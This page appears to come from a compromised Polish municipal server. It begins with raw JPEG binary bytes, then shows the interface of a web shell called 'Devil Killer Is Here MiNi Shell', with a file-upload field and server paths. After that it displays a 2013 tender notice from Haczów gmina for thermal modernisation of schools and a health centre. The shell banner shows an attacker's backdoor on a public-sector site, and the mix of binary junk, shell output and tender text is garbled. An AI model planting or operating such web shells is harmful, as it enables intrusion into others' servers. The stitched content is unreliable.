JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20130604/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20130604/99467-N-2013.html

<p class="kh_header"><b>Haczów: Termomodernizacja obiektów  użyteczności  publicznej  na terenie  gminy Haczów.</b><br>
<b>Numer ogłoszenia: 99467 - 2013; data zamieszczenia: 04.06.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Wójt Gminy Haczów , Haczów 573, 36-213 Haczów, woj. podkarpackie, tel. 013 4391002, faks 013 4391696.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://bip.haczow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Termomodernizacja obiektów  użyteczności  publicznej  na terenie  gminy Haczów..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia są  roboty  budowlane    pn : Termomodernizacja obiektów  użyteczności  publicznej  na terenie  gminy Haczów.
Projekt będzie realizowany w woj. podkarpackim, powiecie brzozowskim, Gminie Haczów, miejscowościach: Malinówka  nr budynku 61, Jasionów nr budynku 159, Trześniów nr budynku 107, Jabłonica Polska nr budynku 178    i Wzdów nr budynku 121.
W zakres inwestycji wchodzą następujące zadania  :
1.Termomodernizacja budynku ZS (cześć nowa) w Jasionowie.
ocieplenie ścian zewnętrznych styropianem gr. 11cm na pow.781,85m2
montaż głowic termostatycznych przy grzejnikach 44 szt
wykonanie obróbek blacharskich (czapki kominowe, nowe rynny dachowe i rury spustowe, rewizje do rur spustowych)
obsadzenie kratek wentylacyjnych w otworach kominów
montaż  łapaczy śniegowych
wykonanie podbitki dachu
wymiana zwodów pionowych nienaprężanych instalacji odgromowej i uzupełnienie bednarki instalacji odgromowej
wymiana opraw oświetleniowych żarowych IP44
montaż i demontaż rusztowań oraz osłony z siatki
remont daszków
remont schodów zewnętrznych

2.Termomodernizacja budynku ZS (część stara) w Trześniowie. 
ocieplenie ścian zewnętrznych styropianem gr. 14cm na pow. 575,93m2
wymiana stolarki otworowej zewnętrznej: okiennej (17szt.) i drzwiowej (1szt.)
modernizacja systemu ciepłej wody użytkowej: Projektuje sie montaż 1kpl. kolektorów słonecznych: 3  szt.  płaskie  o  pow. czynnej  6 m2
Zadanie obejmuje:
wykonanie konstrukcji pod kolektory słoneczne
montaż kolektorów słonecznych, na dachu budynku
posadowienie bufora solarnego i podłączenie bufora do istniejącej instalacji
wykonanie rurociągów solarnych łączących kolektory z buforami
wykonanie rurociągów ciepłej i zimnej wody
montaż grupy pompowej solarnej
wykonanie prób ciśnienia instalacji c.w.u. i instalacji solarnej
napełnienie instalacji solarnej czynnikiem solarnym
montaż regulatora solarnego i czujników temperatury
programowanie regulatora
uruchomienie instalacji.
montaż parapetów wewnętrznych
wykonanie obróbek blacharskich (czapki kominowe, nowe rury spustowe, rewizje do rur spustowych)
wykonanie izolacji przeciwwilgociowych poziomych
obsadzenie kratek wentylacyjnych w otworach kominów oraz montaż na kominach daszków wywietrznikowych
wykonanie podbitki dachu
remont instalacji odgromowej
remont schodów zewnętrznych
remont daszków
wykonanie płytki odbojowej z kostki betonowej
dwukrotne malowanie farba olejna drobnych elementów metalowych
wymiana opraw oświetleniowych żarowych IP44
montaż  i demontaż rusztowań oraz osłony z siatki

3.Termomodernizacja budynku ZS (część stara) we Wzdowie.
ocieplenie ścian zew. styropianem gr. 12 na pow. 201,67m2 i 13cm na pow. 546,03m2
wymiana stolarki otworowej zewnętrznej: okiennej (2szt.) i drzwiowej (1szt.)
montaż głowic termostatycznych przy grzejnikach - 40szt.
montaż parapetów wew.
wymiana rur spustowych i rewizji do rur spustowych
wymiana opraw oświetleniowych
uzupełnienie konstrukcji dachu i wykonanie podbitki dachu
remont instalacji odgromowej
wykonanie izolacji pionowej fundamentów i drenażu opaskowego
montaż  łapaczy śniegowych
dwukrotne malowanie farba olejna drobnych elementów metalowych
montaż  i demontaż rusztowań oraz osłony z siatki
wykonanie daszku nad wejściem do kotłowni
wykonanie płytki odbojowej z kostki betonowej

4.Termomodernizacja sali gimnastycznej  i łącznika w Jabłonicy Polskiej.
ocieplenie ścian zewnętrznych styropianem gr. 12 na pow. 479,71m2 i 13cm na pow. 284,92m2
wymiana stolarki otworowej zewnętrznej: okiennej (104szt.) i drzwiowej (5szt.)
montaż głowic termostatycznych przy grzejnikach 40szt.
ocieplenie ścian wejścia do budynku
zamurowania otworów w ścianach, uzupełnienie tynków i ich dwukrotne malowanie farba emulsyjna
wykonanie tynków wew. na ścianach i słupach oraz dwukrotne ich malowanie farbami emulsyjnymi
montaż parapetów wew.
wykonanie obróbek blacharskich (czapki kominowe, nowe rynny dachowe i rury spustowe, rewizje do rur spustowych)
obsadzenie zasuw kominowych
obsadzenie kratek wentylacyjnych w otworach kominów
montaż łapaczy śniegowych
wykonanie podbitki dachu
wymiana zwodów pionowych nienaprężanych instalacji odgromowej
uzupełnienie bednarki instalacji odgromowej
wymiana opraw oświetleniowych żarowych IP44
montaż i demontaż rusztowań oraz osłony z siatki
remont daszków nad wejściami
remont schodów zewnętrznych
wykonanie okładziny cokolików i posadzek
malowanie farba olejna balustrad
wykonanie płytki odbojowej
wykonanie kanalizacji deszczowej

5.Termomodernizacja budynku Ośrodka Zdrowia i Biblioteki Publicznej w Malinówce.
ocieplenie ścian zewnętrznych styropianem gr. 13cm na pow. 220m2 
wymiana zwodów pionowych nienaprężanych instalacji odgromowej
wymiana rur spustowych i rewizji do rur spustowych
wymiana opraw oświetleniowych żarowych
remont istniejących  i wykonanie nowych daszków
remont schodów i podjazdów zewnętrznych
wykonanie płytki odbojowej z kostki betonowej
montaż i demontaż rusztowań oraz osłony z siatki.

Szczegółowe dane  dotyczące obmiarów, zakresu prac  znajdują się w  przedmiarze robót dołączonym  do niniejszej SIWZ.
3. Do w.w prac niezależnie  od zakresu  robót objętego przedmiarem  , wynagrodzenie  ustalone będzie w formie  ryczałtowej, niezmiennie  do dnia  zakończenia realizacji  zamówienia  publicznego i  ma  zawierać ponadto wszelkie  koszty  związane z:
 - urządzeniem zaplecza budowy,
 - zabezpieczeniem robót pod względem  BHP,
-doprowadzeniem terenu po  wykonaniu  robót do  stanu  pierwotnego, 
- usuwaniem  kolizji z urządzeniami podziemnymi wynikłych  przy  realizacji  projektu,
- wyłączeniem z  ruchu ciągów  pieszych i  jezdnych,
- organizacją  placu  budowy,
- naprawą  nie  zainwentaryzowanych urządzeń podziemnych,
- powstałymi podczas  wykonywania robót  innymi  okolicznościami  nie  przewidzianymi  przez  Wykonawcę,.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.40.00.00-1, 45.33.00.00-9, 45.42.00.00-7, 45.44.30.00-4, 45.33.10.00-6.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.05.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający żąda od wykonawców wniesienia wadium w wysokości: 10.000, złotych, słownie: dziesięć tysięcy złotych 00/100 
b)Termin wniesienia wadium: Wadium wnosi się przed upływem terminu składania ofert. Wadium uznaje się za wniesione, jeżeli: 
- wnoszone w formie pieniądza znalazło się na rachunku bankowym Zamawiającego przed upływem terminu na składanie ofert. 
- wnoszone w pozostałych formach oryginały dokumentów zostały złożone w kasie Zamawiającego w budynku Urzędu Gminy w Haczowie, w pok. nr  5 przed upływem terminu składania ofert. Dokument potwierdzający wniesienie wadium należy dołączyć do oferty, przy czym:  wadium w formie pieniądza należy wnieść na rachunek bankowy Zamawiającego - Podkarpacki Bank Spółdzielczy w  Sanoku  o. Haczów nr 68864210702007700007490004 ,  w przypadku wniesienia wadium w formie innej niż pieniądz do oferty należy załączyć kserokopię dokumentu stanowiącego wadium. Oryginał tego dokumentu należy złożyć w kasie Zamawiającego w budynku Urzędu Gminy w Haczowie, w pok. Nr 5 przed upływem terminu składania ofert.
c) Wadium  może  być  wnoszone  w jednej  lub kilku następujących  formach:
- pieniądzu 
- poręczeniach  bankowych  lub poręczeniach  spółdzielczej kasy  oszczędnościowo-kredytowej, z tym ze  poręczenie kasy  jest zawsze poręczeniem pieniężnym
- gwarancjach  bankowych
- gwarancjach  ubezpieczeniowych
- poręczeniach  udzielanych  przez podmioty  o których  mowa  w art. 6b ust.5 pkt. 2 ustawy z dnia 9 listopada 2000 r. o  utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości ( Dz.U. Nr 109, poz. 1158, z póź. zm.)</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu dokonania oceny  spełniania w.w warunku niezbędne są:
a) Dokument potwierdzający  posiadanie  uprawnień  do  wykonywania określonej  działalności  lub czynności , jeżeli przepisy prawa nakładają  obowiązek ich  posiadania , w szczególności  koncesji  , zezwolenia  lub  licencji.  Jeżeli wykonawca  ma siedzibę  lub miejsce  zamieszkania  poza terytorium Rzeczypospolitej Polskiej , zamiast w/w  dokumentu składa  dokument  lub  dokumenty   wystawione  w  kraju , w  którym  ma miejsce  zamieszkania  lub  siedzibę , potwierdzające odpowiednio, że posiada  uprawnienia do  wykonywania  działalności  związanej              z  przedmiotem  zamówienia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że wykonawca posiada niezbędną wiedzę i doświadczenie, jeżeli wykaże się:
 a) wykonaniem w okresie ostatnich pięciu lat przed upływem terminu składania ofert , a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej 5 robót budowlanych polegających na  wykonaniu robót  budowlanych  w zakresie zbieżnym z  niniejszym postępowaniem.
Ocena spełniania warunku zostanie dokonana na podstawie oświadczenia o spełnianiu warunków udziału w postępowaniu złożonego przez wykonawcę oraz na podstawie następujących dokumentów, jakie wykonawca powinien złożyć w postępowaniu:
wykaz robót  budowlanych wykonanych  w okresie  ostatnich pięciu lat  przed upływem terminu składania ofert albo  wniosków  o  dopuszczenie  do  udziału  w  postępowaniu  , a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, , wraz z podaniem  ich  rodzaju i wartości , daty i miejsca  wykonania oraz załączeniem dowodów dotyczących najważniejszych  robót, określających  czy roboty te  zostały wykonane w sposób należyty oraz  wskazujących czy zostały  wykonane  zgodnie  z  zasadami  sztuki  budowlanej i prawidłowo ukończone.
Dowodami są; poświadczenie. Poświadczenie  powinno  być wydane nie wcześniej  niż na  3 miesiące przed upływem terminu  składania ofert. Jeżeli  z  uzasadnionych przyczyn                      o obiektywnym charakterze  wykonawca nie jest  w  stanie  uzyskać poświadczenia, składa inne  dokumenty.
W przypadku gdy zamawiający jest podmiotem  na rzecz którego  roboty  budowlane   wskazane  w  wykazie  zostały wcześniej  wykonane, wykonawca nie ma  obowiązku przedkładania  dowodów  wyżej wymienionych.  
W miejsce poświadczeń  jako dowodów , że usługi  zostały wykonane  należycie, dopuszcza się przedkładanie dokumentów potwierdzających należyte  wykonanie robót  budowlanych  zgodnie  z zasadami  sztuki  budowlanej i ich  prawidłowe  ukończenie , określone w § 1 ust. 2 pkt 1 rozporządzenia Prezesa Rady Ministrów z dnia  30 grudnia  2009 r. w sprawie rodzajów dokumentów, jakich może żądać zamawiający od wykonawcy, oraz form, w jakich te dokumenty mogą być składane. (Dz. U. Nr 226 , poz. 1817)</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że wykonawca dysponuje potencjałem technicznym  do wykonania zamówienia, jeżeli:
a) dysponuje lub  dysponował będzie  sprzętem adekwatnym do wykonania niniejszego zamówienia.
Ocena spełniania warunku zostanie dokonana na podstawie oświadczenia o spełnianiu warunków udziału w postępowaniu złożonego przez wykonawcę oraz na podstawie następujących dokumentów, jakie wykonawca powinien złożyć w postępowaniu:
a) wykazu narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy   robót  budowlanych   w celu wykonania zamówienia wraz z informacją o podstawie dysponowania  tymi zasobami;</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że wykonawca dysponuje  osobami zdolnymi do wykonania zamówienia, jeżeli:
a) dysponuje lub dysponował będzie  osobami do wykonania zamówienia        
Ocena spełniania warunku zostanie dokonana na podstawie oświadczenia o spełnianiu warunków udziału w postępowaniu złożonego przez wykonawcę oraz na podstawie następujących dokumentów, jakie wykonawca powinien złożyć w postępowaniu:
a) wykazu osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za kierowanie  robotami  budowlanymi wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że wykonawca spełnia ten warunek udziału w postępowaniu, jeżeli:
a) wykonawca posiada (dysponuje) na rachunku bankowym środkami pieniężnymi (lub posiada zdolność kredytową) 
Ocena spełniania warunku zostanie dokonana na podstawie oświadczenia o spełnianiu warunków   udziału w postępowaniu złożonego przez wykonawcę oraz na podstawie następujących dokumentów, jakie wykonawca powinien złożyć w postępowaniu:
a)informacji banku lub spółdzielczej kasy oszczędnościowo-kredytowej, potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawionej nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową innego podmiotu, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.3.2)</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 10 -11 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Wykaz  dokumentów składających się na ofertę wraz z załącznikami, które Wykonawcy są zobowiązani dostarczyć Zamawiającemu:
a) oświadczenie Wykonawcy o spełnianiu warunków udziału w postępowaniu (załącznik nr 1 do SIWZ)
b) oświadczenie Wykonawcy o nie podleganiu wykluczeniu z postępowania (załącznik nr 2 do SIWZ).
c) wypełniony formularz ofertowy (załącznik nr 3 do SIWZ).
d) dokumenty potwierdzające spełnianie przez Wykonawcę warunków udziału w postępowaniu  określone w  pkt.7 SIWZ 
e) dokumenty potwierdzające  nie podleganie wykluczeniu określone w pkt. 8  SIWZ
f) uzupełniony wykaz  wykonanych  robót wg  wzoru , zał. Nr 6 SIWZ
g) uzupełniony wykaz  wyposażenia  technicznego wg  wzoru , zał. Nr 7 SIWZ
h)) uzupełniony wykaz  personelu , wg  wzoru  zał. Nr 8 SIWZ
i) uzupełniony harmonogram  rzeczowo  finansowy  wg wzoru , zał. Nr 9 SIWZ
